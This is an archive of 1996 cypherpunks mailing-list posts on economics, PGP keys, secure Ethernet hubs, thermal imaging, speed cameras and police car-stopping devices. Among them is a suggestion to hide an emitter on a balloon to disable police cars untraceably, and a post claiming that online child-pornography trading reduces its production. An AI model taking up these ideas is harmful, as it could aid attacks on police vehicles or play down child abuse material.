complete transactions at given prices.  You may think that you are smart
enough to decide what a good or service should sell for, but if you're not
putting cash on the barrel head, you're not even part of the process of
arriving at the "price".

*******

Just a suggestion to future Econopunks posters: Try not to post the
economics equivalent of the "Can't you make an unbreakable code by running
the plaintext through a Caesarian Cypher 7500 times?" question.

DCF

"No good or service should be sold for more than its cost of production --
therefore, all you folks who are ripping off your employers must report to
the slave barracks where you will be provided with triple bunks (hot
bunked), all the rice and beans needed to sustain life, a multivitamin
tablet daily, and loads of clean water."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@sso-austin.sps.mot.com (Ben Combee)
Date: Wed, 14 Aug 1996 04:33:19 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Geek Apartments
In-Reply-To: <9608121340.AA47329@jon.clearink.com>
Message-ID: <9608131541.AA26416@sso-austin.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


* I can see it now. Apartments full of geeks because the apartments 
* were originally built with 100BaseX to each place and a T3 in the 
* basement going direct to the local ISP.
* 
* Tack on another $200/month or whatever to the apartment cost ( geeks 
* can afford that for sure ) and one might end up having a pretty nice 
* online melrose place.
* 
* I wonder if anybody has done that yet...

Yes, it has already happened, although in a slightly different
context.  The Georgia Tech campus dormatories got wired with Ethernet
back in 1994, and there was quite a rush by the sizable geek
population to get dorm rooms in the buildings slated to get
installation first.  It worked out quite well, especially the privacy
aspects, as the dorm routers encrypted all packets so only the
intended Ethernet node could receive it (at least that is what they
said).  

So, in this case it was only 10BaseT and gatech.edu as the ISP, but it
still was very neat.

-- 
Ben Combee, Software Developer (Will write assembly code for food)
Motorola > MIMS > MSPG > CTSD > Advanced ICs > Austin Design Center
E-mail: combee@sso-austin.sps.mot.com   Phone: (512) 891-7141




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 14 Aug 1996 05:58:53 +0800
To: cypherpunks@toad.com
Subject: Re: (Off Topic) Re: FCC_ups
Message-ID: <v02120d0bae366adef979@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:01 8/13/96, David Wagner wrote:

>The *real* challenge: how do you support sender- and recipient- anonymous
>phone calls with strong security?  Have fun.

Sender anonymous phone calls are easy. You route them through PipeNet,
assuming every PipeNet node has a telephony gateway. Recipient anonymous
phone calls a harder to implement.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 14 Aug 1996 06:16:07 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
Message-ID: <v02120d0cae366bab297f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:27 8/13/96, Peter Trei wrote:

>I vaguely remember another possibly relevant precedent, where a
>judge ruled that a warrant was required before a thermal imager
>could be used to look at a house suspected by the police of
>being a (pot) grow house.

Wrong. No warrant was used and the bust was upheld in court.




-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 14 Aug 1996 06:33:03 +0800
To: cypherpunks@toad.com
Subject: Re: cybergangs
In-Reply-To: <199608130215.EAA20375@basement.replay.com>
Message-ID: <LTuLsD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com (Anonymous) writes:

> Dimitri Vulis ranted thusly into the aether:
> 
> >Death to the Usenet Cabal! All power to the GruborBots!
> 
> Jeez, is there no place safe from Dimitri's Cabal rantings? There Is No Cabal
> fnord. So there.

There is no place on the 'net safe for the Usenet Cabal or the fucking statists
who call themselves "libertarians".

> 
> ObCypherpunks: It's worth noting that Dimitri's reputation capital is so deva
> 
> dlv@bwalk.dm.com                                             Dr. Dimitri Vuli
>    ! Vote rejected by votetaker (untrusted site)
> 
> This is from Message-ID: <839564931.8926@uunet.uu.net>, btw.
> 
> 


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Tue, 13 Aug 1996 14:04:42 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Yet another blame-the-Internet-for-child-porn
In-Reply-To: <01I876WBU7C89JD5RL@mbcl.rutgers.edu>
Message-ID: <199608130140.LAA20673@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 	They are, of course, failing to answer the question of why encouraging
> people to consume _computer-generated_ child pornography should be considered
> a justification for legal intervention, not to mention that such an effort
> would also make putting _Lolita_ on the Internet illegal (text could drive
> up demand for it as well, after all), or even political speech such as from
> NAMBLA. (It's political speech just as much as material from neo-Nazis... or
> from the Demopublicans.)

I don't see what the FBI is complaining about. Child pornography traded
on the net makes produces of child pornography incredibly easy to
locate. The child porn peddlers and consumers caught on the network are
usually soft, chewy and coperative, responding well to all manner of
threats and inducements. Further the piracy in child pornography tends
to create a buyers market, drives prices down substantially, reducing
the incentive to produce original material at all.

--
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Bashinski <jbash@cisco.com>
Date: Wed, 14 Aug 1996 07:03:02 +0800
To: amehta@giasdl01.vsnl.net.in (Arun Mehta)
Subject: Re: India, Productivity, and Tropical Climes
In-Reply-To: <1.5.4.32.19960813173132.002f7834@giasdl01.vsnl.net.in>
Message-ID: <199608131901.MAA02656@mort>
MIME-Version: 1.0
Content-Type: text/plain


> Didn't Mark Twain say that the coldest winter he had ever
> experienced was a summer in San Francisco?

Mark Twain also said (from memory, and probably not exact): "In India,
'cold weather' is merely a polite phrase used to distinguish weather
that will melt a brass doorknob from weather that will only make it mushy.".

Sorry, couldn't resist...

					-- John B.
					   Very near San Francisco




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasa.roskar@uni-lj.si
Date: Tue, 13 Aug 1996 22:15:57 +0800
To: cypherpunks@toad.com
Subject: PGP...
Message-ID: <009A6C9C.E823907E.18@uni-lj.si>
MIME-Version: 1.0
Content-Type: text/plain


I'm confused.... if you don't want people to be able to read your
email, you code it with PGP or other encoders... but why give away
your key on your website to everyone? That makes your email readable
to everyone... doesn't it? Oh well... I hope someone can explain this
to me...

Roki




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 14 Aug 1996 00:42:28 +0800
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: non-secure network utilities - pointers?
In-Reply-To: <Pine.SUN.3.91.960813010527.1025D-100000@quesnay.Berkeley.EDU>
Message-ID: <Pine.GSO.3.93.960813125009.13713E-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Tue, 13 Aug 1996, Sam Quigley wrote:

> I'm looking for secure telnet, ftp, talk, etc. that I can run over a 
> potentially insecure network (and their respective daemons).

SSH is one way to go, as besides secure rlogin and rsh you can also set up
secure encrypted tunnels between hosts for different applications, like X
or some other TCP/IP apps.

Have a look at http://www.ssh.fi/

SSLtelnet/SSLftp are an other option.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an681132@anon.penet.fi
Date: Wed, 14 Aug 1996 02:33:13 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system?
Message-ID: <9608131321.AA13545@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



>> Previously, jonathon <grafolog@netcom.com> wrote:
>>
>>	I know of a very good way to ensure that judges do follow
>>	the standards that they claim to follow.
>>
>>	It works even better at making politicians keep all the
>>	election promises the make.
>>
>>	Has one drawback --- it reduces the number of people willing
>>	to carry out those two functions to virtually zero.  OTOH, that
>>	probably would be a very good thing.  

> Previously, jim bell <jimbell@pacifier.com> wrote:
> That's odd...I know of one also!    B^)

Ok, please clue in the clueless.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <rollo@artvark.com> (Rollo Silver)
Date: Wed, 14 Aug 1996 08:27:20 +0800
To: cypherpunks@toad.com
Subject: cypher-illiteracy
Message-ID: <v03007801ae368223d722@[206.183.203.4]>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher or Mike Duvos or somebody said, Re: FPGAs and Heat (Re:
Paranoid Musings)
> That's one of the things that killed Thinking Machines.  It turned out
> that a standard supercomputer with PIM chips for memory could give the
> same performance for less money.

See:

http://cesdis.gsfc.nasa.gov/linux/beuwolf/beuwolf.html

I had a bit of difficulty connecting with the URL, finally discovering that
it's "beowulf", not "beuwolf". So try:

http://cesdis.gsfc.nasa.gov/linux/beowulf/beowulf.html

Also, re pipe bombs, attempting to access the URL
http://sdcc13.ucsd.edu/~m1lopez/pipe.html
yields (as of Tue, Aug 13, 1996(13:31 MDT))
The requested URL /~m1lopez/pipe.html was not found on this server.

Rollo Silver / Amygdala | e-mail: rollo@artvark.com
216M N. Pueblo Rd, #107 | Website: http://www.artvark.com/artvark/
Taos, NM 87571 USA      | Voice: 505-751-9601; FAX: 505-751-7507






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 14 Aug 1996 08:38:39 +0800
To: "'cypherpunks@toad.com>
Subject: RE: National Socio-Economic Security Need for Encryption Technology
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960813204534Z-26547@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Bart  Croughs
>
>You haven't answered this question yet. I don't claim that the U.S. is worse
>off when US capital moves abroad. I only ask: how can you proof that the US
>isn't worse off when US capital moves abroad? 
.............................................................


You have to be able to imagine the advantages, and you can only imagine
them when you have the background to understand the difference between
having fewer choices rather than more, a limited market base rather than
an open one full of unlimited opportunity, and the increased domestic
tensions from frustrated consumers who are likely to set up blackmarkets
as work-arounds to the lack of desired goods & services. 

Essentially, you have to want to see, and work for, the difference
resulting from unprotected markets.   I think people who put up a lot of
objections are afraid and do not want any proof of their error.   You'd
have to hold their nose to the figures, and even then they might close
their eyes....

   ..
Blanc



>
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 14 Aug 1996 07:07:49 +0800
To: schryver@radiks.net
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
Message-ID: <9608131856.AA05229@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



If foil or metal mesh would block it, then many recently built houses
would be already set.  Usually that 1/2 - 1 inch styrofoam used 
on almost all exterior walls has a reflective layer of foil to help
keep the heat/cold out.

Then again, this sounds like hype-ed up infra-red technology
to me, in which case seeing through walls is B.S.

Dan

> 
> At 06:56 PM 8/12/96 EDT, you wrote:
> Since metal blocks the waves and stands out on the screen one could affectively
> block its use by putting up a fine metal mesh on the interior of all walls 
> that are exterior to the house.  The same could be said for clothing that 
> looks normal but has a metal mesh liner, like say a trench coat.
> 
> >	I would wonder if a jamming device (preferably area-effect with a 
> >slowly randomly varying swathe of area, to avoid figuring out who was carrying
> >it) would be possible, or some variety of shielding (i.e., emitting waves
> >looking similar to flesh).
> >	-Allen
> >
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an681132@anon.penet.fi
Date: Wed, 14 Aug 1996 06:16:02 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system? & a little off topic
Message-ID: <9608131358.AA28171@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> Preiously, jim bell <jimbell@pacifier.com>
> <snip>  However, hours after it was publicly revealed that the Atlanta 
> 911 center screwed up, wasting 10 minutes looking up the address of 
> "Centennial park,"  <snip>

After watching the news during the coverage of the 911 call, I couldn't
help but  notice the free computer advertisement.  I don't suppose that
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 14 Aug 1996 09:51:01 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Geek Apartments
In-Reply-To: <9608131541.AA26416@sso-austin.sps.mot.com>
Message-ID: <Pine.GUL.3.95.960813140118.5632A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, Ben Combee wrote:

> Yes, it has already happened, although in a slightly different
> context.  The Georgia Tech campus dormatories got wired with Ethernet
> back in 1994, and there was quite a rush by the sizable geek

The graduate residences at Stanford were built with 10Base2 in 1986, and 50%
of the undergrad dorms were wired with 10BaseT by 1993. So there.

> population to get dorm rooms in the buildings slated to get
> installation first.  It worked out quite well, especially the privacy
> aspects, as the dorm routers encrypted all packets so only the
> intended Ethernet node could receive it (at least that is what they
> said).  

The "secure hubs" at GATech don't do encryption -- no way could that be done
at wire speed. What they do is fill the data portion of the Ethernet packet
with nulls. Everyone gets to see the source and destination MAC address and
length of every packet, but only the recipient (or a very clever spoofer --
most of the "secure hubs" on the market have a few vulnerabilities) gets
the data.

If you run a packet sniffer, all you get are CRC errors (in order to
maintain wire speed, the non-destination ports don't compute one). 

As far as real-world geek apartments go, I heard of one in Manhattan that
worked exactly as described. I don't know whether they run "secure hubs."
Presumably they would -- I can't think of a major manufacturer's manageable
10BaseT hub that lacks MAC address lockout features.

OTOH, I've heard tell that several of the residential coax experiments run
promiscuously. Everything your neighbor does online, you can see with the
right software.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Wed, 14 Aug 1996 02:17:51 +0800
To: sasa.roskar@uni-lj.si
Subject: Re: PGP...
In-Reply-To: <009A6C9C.E823907E.18@uni-lj.si>
Message-ID: <3210771C.41C67EA6@is.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Hi

>I'm confused.... if you don't want people to be able to read your
>email, you code it with PGP or other encoders... but why give away
>your key on your website to everyone? That makes your email readable
>to everyone... doesn't it? Oh well... I hope someone can explain this
>to me...

Not really, because when you generate a key, you generate a key, two are
actually generated: one public and one private. 

The public key you give to *everyone*, put in you signature, in the
newspapers and in your .plan; wherever. You also then have a matching
private key, which you NEVER give out.

Now the mathematics are pretty simple, but I'll pass over it.
Essentially your public key will decode what your private key encrypts
and your private key will decode what your public key encodes. 

So if someone uses your public key to send a message to you, only you
can decode it, since ONLY you have the matching private key.

This is used for signing as well. If you encrypt your message with your
private key, only your public key and decode it, since ONLY you have the
matching private key, if your public key, which everyone has, can decode
it, then ONLY you could have sent it. So to sign and encrypt a message
to someone all that happens is you encrypt your message with your
private key and then again with their public key. And it will be signed
(only you could have sent it) and encrypted (only they can read it)

I should mention at this point that pgp handles all this, because it
sounds very complex and time-consuming. To encrypt a message you simply
type:

pgp -e PrivateLetter.txt sasa.roskar@uni-lj.si

--> call pgp [pgp] and encrypt [-e] a message [PrivateLetter.txt] to the
recipient [sasa.roskar@uni-lj.si]. Pgp will look sasa.roskar@uni-lj.si
up in your own public keyring and use that public key. Signing is just a
matter of saying -s as well

Hope this helps, and is accurate.

Later
Mike

-- 
I'm sure we will find out in a few years that Microsoft invented the
Net.  Or brought it to the masses.  Or saved it from a certain and
early demise.  Or all of the above. 
     JAMES SEYMOUR




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Aug 1996 09:31:32 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
Message-ID: <199608132155.OAA09738@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 AM 8/13/96 -6, Peter Trei wrote:
>
>Tim writes:
>
>> I don't see how "remote scanning" of the population at large, without
>> probable cause, is much different from the cops listening in from a
>> distance with parabolic antennas. Both cases involve detection of signals
>> emitted from the target. And yet such long-distance interception is not
>> allowed without a warrant.
>
>I vaguely remember another possibly relevant precedent, where a
>judge ruled that a warrant was required before a thermal imager
>could be used to look at a house suspected by the police of
>being a (pot) grow house.
>Peter Trei
>trei@process.com

There was just such a decision in Washington state about a year ago, as I 
recall.  However, as I recall there has been a contradictory decision 
elsewhere, so the law isn't clear.

It seems to me that the main problem with such "evidence" is not the search 
itself, but the interpretation of the results:  Having a hot house isn't a 
crime, and indeed it was not practically detectable before IR viewers.  And 
an IR viewer only tells you the house is hot; it doesn't say why its hot.  
Apparently, when the "justice system" gets a new toy, it subtly adjusts its 
standards to use that toy, regardless of minor issues such as right and 
wrong.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 14 Aug 1996 02:58:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <ae35140a07021004ebf2@[205.199.118.202]>
Message-ID: <3210858B.7D55368C@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 4:46 PM 8/12/96, snow wrote:
> >On Sat, 10 Aug 1996, Gary Howland wrote:
> 
> >>       Will old fashioned engines be outlawed?
> >>       Will the "stun guns" be outlawed?
> >>       Will susceptible electronic systems become mandatory?
> >>       (and if so, why not just put a remote control switch in all cars?)
> >
> >    One word: Pacemakers.
> 
> Not just pacemakers, but also cars losing steering control (but not forward
> speed, obviously) and thus plow into crowds. And airbags that perhaps get
> triggered in all the ruckus, breaking the necks of infants (as has
> happened).
> 
> Think of the liablility issues! Deliberately causing a car to lose control.
> Mon Dieu!

Somehow I don't think they'll give a damn about killing passengers
and/or pedestrians (after all, they'd shoot them if they were in
range, wouldn't they?)

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 14 Aug 1996 04:33:42 +0800
To: "'cypherpunks@toad.com>
Subject: Re:  National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB892E.F84FC960@groningen13.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote:

>The problem with the "Croughs Axiom" is not that there is not a _general_
correlation between average national wages and average national capital
investment--there is. <

As I said, I would be proud if the axiom that wages are determined by the amount of capital invested was discovered by me, but it really isn't, so there is no reason to keep calling it the "Croughs axiom". This is no display of false modesty. This axiom was already accepted by Austrian economists when I wasn't even born. See my quotes of Rothbard, Hazlitt, etc. in one of my previous posts on this subject.

>A scatter plot of wages vs. capital investment for
the 200 or so nations would almost certainly show that the Ivory Coast has
low per capita wages and low per capita wages, Sweden has both higher wages
and higher capital investment per capita,  and so on.<

I couldn't agree more.

> Correlation, of course, is not causation.<

Sometimes correlation and causation don't go together; sometimes they do. In this case, they go together. I mentioned the reasoning behind this in a previous post on this subject, but maybe you didn't read this, so I will repeat it here:
"Imagine Robinson Crusoe. In the beginning, he catches fish with his bare hands. He has no capital investment, and consequently he is not very productive. His wage will be low (he will not catch much fish). If there is more capital investment - if, for example, he has a fishing rod - he will catch more fish in less time. His productivity is higher. His wage is higher (more fish). If there is still more capital investment - if, for example, he has a boat and fishing nets - he will catch even more fish. His productivity is higher. His wage is higher. Etcetera. So, it's really not difficult to see that Robin's standard of living depends on the amount of capital available on his island. The same goes for the rest of humanity."

:>No, the problem was that Croughs invoked this general _correlation_ (which
can arise for various reasons) to support his mercantilist protectionist
ideas.<

This general correlation between wages and the amount of capital invested does not arise for various reasons; it arises for the reason explained above. But of course there are reasons why there is more capital investment in the U.S. than there is in Third World countries. The main reason is that economic activities were and are hindered by the Third World governments more than by the U.S. government.
	As I already explained in a previous post on this subject, I have no mercantilist protectionist ideas. Even when the movement of US capital abroad would lead to a drop in wages for US workers,  I would still support the free movement of capital, simply because I subscribe to the libertarian non-aggression axiom. (And no, I didn't discover this axiom either. Alas.) 

> (He also didn't say he was talking of nations, which is why some of
us found the examples we did, e.g., MacDonald's vs. law firms, which have
the opposite correlation he described.)<

I didn't say I was talking about nations, because I thought this would be obvious for anyone who knows a bit about economics. Maybe I should have been more explicit here.

>And the cloud of ideas connected with somehow forcing capital investment to
remain in the U.S....well, the best way to do this is to alter the tax laws
so that America (for example) becomes a magnet for investment. (If one is
looking to help America, that is.)<

I couldn't agree more. But this still doesn't answer the question I asked in my original post.

>In any case, the original notion, of somehow using cryptography policy to
support U.S. interests....well, I rather doubt that Menger, Von Mises,
Hayek, Hazlitt, or any of the others connected with the Austrian School
would buy Crough's protectionist arguments.<

I don't understand. Do you mean to say that I had the notion of using cryptography policy to support U.S. interests? Read my posts again, I can't find this notion in my posts.
	It agree that Menger, Von Mises, Hayek or Hazlitt could probably answer the question I asked in my original post, which I will repeat here for the sake of clarity:
	 "If American companies are moving capital to Third World countries because of the low wages in these countries, then the workers in the Third World will of course be better off. But in the US, the amount of capital will be lowered. So the American workers will be able to get other jobs, but these jobs will pay less, because of the diminished amount of capital in the US. (As I said in another post on this subject, I mean that these jobs will pay *relatively less*, that is: less than they would have been paid if the American capital wouldn't have left the U.S.)
	Of course there are advantages also for the US (shareholders will get higher returns, trade will increase), but how can you proof that these advantages will offset the disadvantage of the lowered amount of capital in the US? "
	 
So I agree that the Austrian economists could probably answer my question, but in their books I wasn't able to find the answer, and these economists are not on this list. So I hoped that others on this list who had knowledge of Austrian economics could answer this question.  That's really the only reason I asked my question: I wanted to be able to rebut protectionist arguments more effectively.You seem to be acquainted with the Austrian economists, but so far, you didn't answer my question.

>And I certainly know that jingoistic appeals to "America First!" are
inconsistent with the sentiments of many or even most on this list.<

I know, that's why it's so disappointing that nobody has been able to answer my question thus far. And, as I said earlier, I share this sentiment; that's why I'm on the list. I just want to be able to defend my sentiments better against protectionist arguments.
	


Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 14 Aug 1996 03:15:02 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <01BB892E.FDB63BA0@groningen13.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissel wrote:

>In the long run, employers will bid wages up to the level of discounted
value of marginal product of the labor -- the present value of the future
"price" of the increase in output ascribable to the added worker.<

You are right. Wages are determined by the productivity of labor. But the productivity of labor in its turn is for a large part determined by the amount of capital invested. So, there is no contradiction here.

>It never ceases to amaze me that there are people in this country who
actually believe that the average American in poorer now than in 1970.  I
can only be those who were unconscious in 1970.<

I think you're probably right again, but I never said that the average American is poorer now than in 1970. Again, no contradiction here.

Bart Croughs    












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an681132@anon.penet.fi
Date: Wed, 14 Aug 1996 04:42:09 +0800
To: cypherpunks@toad.com
Subject: Re: don't say "bomb" on the internet
Message-ID: <9608131553.AA14051@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Previously "I=(!isnum(self))" <geeman@best.com> wrote:
<snip>
>       `(l) It shall be unlawful for any person to teach or demonstrate the
>making of explosive materials, or to distribute by any means information
>pertaining to, in whole or in part, the manufacture of explosive materials,
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 14 Aug 1996 10:03:51 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: photographed license plates
Message-ID: <v02140b00ae36c4403679@[204.179.128.40]>
MIME-Version: 1.0
Content-Type: text/plain



rpowell@algorithmics.com writes:
>Simon Spero <ses@tipper.oit.unc.edu> writes:
>     > In the UK they now use cameras to deter speeding [...]
>
> In Ontario, they tried this on some of the major highways.  The most
> interesting thing about it was that it was proved time and time again
> that the technology was not up to snuff: there was an almost 0% chance
> of being caught.  When the license plate wasn't obscured or unreadable
> (which it usually was) the computerized mailing system made some
> stupid mistake that allowed the person to get off if they challenged
> it.

One problem with using such systems in the US (I have no idea about traffic
laws in Ontario so maybe this was the loophole you mentioned) is that even
with a perfect shot of the license plate the system only identifies a car,
not a driver.  Speeding tickets are given to drivers, not necessarily to
the owner of the speeding car.  Here in the states the easy challenge to
such a ticket would be "it was not me driving when that photo was taken" and
the burden of proof is on the prosecution to prove that you were the driver.
Since some states do not require front license plates the cameras take shots
of the tail end of the car, not the best angle for identifying drivers.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: morgan@keilin.helsinki.fi (Joel Morgan)
Date: Wed, 14 Aug 1996 02:23:59 +0800
To: cypherpunks@toad.com
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <199608131316.QAA05679@keilin.helsinki.fi>
MIME-Version: 1.0
Content-Type: text/plain


It seems clear that capital investment in tools will contribute to the
-productivity- of workers.  (Tools here meaning whatever machinery/
infrastructure is used to get work done.)

Bart Croughs quotes a number of economists who seem to be saying that
when capital investment leads to increased productivity (per worker)
this also leads to higher wages.

I'm not sure I understand -why- this should necessarily be so.  It's my
impression that in manufacturing industries, the more mechanized
production is, the more workers will get paid.  Then again, perhaps a
more mechanized industry will pay more because more mechanized
industries hire workers with higher skills (albeit fewer workers).

It's my impression that when a company makes capital investments which
increase productivity, the fruits of this increased worker productivity
are shared (to some extent) with the workers.  I can imagine a number of
reasons why this might be done, but it's not absolutely clear to me
that this would be a direct result of market forces.

-- 
=====================================================================
Joel.Morgan@Helsinki.FI              http://blues.helsinki.fi/~morgan
    "Over the mountains there are mountains."   -- Chang-rae Lee 
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 14 Aug 1996 11:56:34 +0800
To: gary@systemics.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <01I88ETCWWHC9JD663@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	A: How possible is it to insulate cars from these effects? B: If it
can't be insulated from with reasonable levels of effort, it would appear to be
perfectly usable against cop cars. If the emitter is in a transparent baloon
1000 feet up, I doubt they're going to be able to track back to the user.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Wed, 14 Aug 1996 08:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: photographed license plates
In-Reply-To: <Pine.SUN.3.91.960810194513.13080C-100000@tipper.oit.unc.edu>
Message-ID: <96Aug13.165923edt.20481@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <Pine.SUN.3.91.960810194513.13080C-100000@tipper.oit.unc.edu>, Simon Spero <ses@tipper.oit.unc.edu> writes:

    > In the UK they now use cameras to deter speeding; the cameras are 
    > triggered by vehicles passing by which exceed the speed-limit, so in 
    > theory it's only naughty people who get photographed. Interestingly 
    > enough, there are far more places with camera warning signs than there 
    > are actual cameras; the actual cameras are moved around at random. Even 
    > though most of the time there isn't a camera there, almost everbody 
    > seemed to slow down in the marked areas; probably because there's almost 
    > 100% chance of being caught if there is a camera there. 

In Ontario, they tried this on some of the major highways.  The most
interesting thing about it was that it was proved time and time again
that the technology was not up to snuff: there was an almost 0% chance
of being caught.  When the license plate wasn't obscured or unreadable
(which it usually was) the computerized mailing system made some
stupid mistake that allowed the person to get off if they challenged
it.

The interesting thing is that the project was scrapped for these
reasons when the next government came in, but studies showed that it
